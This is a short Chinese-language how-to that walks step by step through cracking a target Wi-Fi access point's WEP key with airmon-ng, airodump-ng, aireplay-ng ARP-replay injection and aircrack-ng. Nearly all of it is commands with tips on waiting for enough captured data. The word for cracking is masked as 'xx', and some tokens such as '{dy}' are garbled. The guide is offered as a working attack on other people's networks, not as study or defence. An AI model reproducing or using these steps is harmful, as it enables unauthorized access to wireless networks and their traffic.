1. ifconfig -a 查看网络接口情况,我的无线接口是eth0,还要记下MAC
2. airmon-ng start eth0 启动Monitor,系统会反馈已经开启
3. airodump-ng --ivs -w name -c 6 eth0 这里的name,你可以随意取个名字,但是不要忘了,xx时要用,6是我要xx的AP频道,我的目标AP是6,此窗口保留,另开一个窗口,继续下面的操作。
4. modprobe ipw2200 rtap_iface=1
5. iwconfig eth0 ap 00:00:00:00:00:00 其中00:00:00:00:00:00是目标AP的MAC
6. iwconfig eth0 key s:fakekey
7. iwconfig eth0 mode managed 以上这些是加载2200BG的补丁及目标AP的连接,在此窗口继续下面的内容
8. aireplay-ng -3 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 eth0
这是发起对目标AP的攻击,其中11:11:11:11:11:11是你自己无线网卡的MAC,此时系统会开始运行攻击,并显示情况,{dy}个值在不断增加,你需要耐心等到那一刻,当这一刻到来时,你就成功一半了,这时{dy}个窗口里目标AP的Data值在猛涨,当目标AP的Data值涨到10000以上时,你就可以再打开一个新的窗口开始xx了
9.aircrack-ng -n 64 name-01.ivs 这就是在新窗口下的xx命令,不知道它是64位加密还是128位加密,你就用64位吧,name就是你最开始的命令里自定义的名称,别搞错了,此时系统会列出所有信号,并让你选择要xx的AP,目标AP那一行{zh1}有括号(ivs),表示它拥有收集到的可xx的信息,输入它的数字编号,回车,系统开始为你xx很快你就会看到KEY FOUND:[这里是你要的密码] |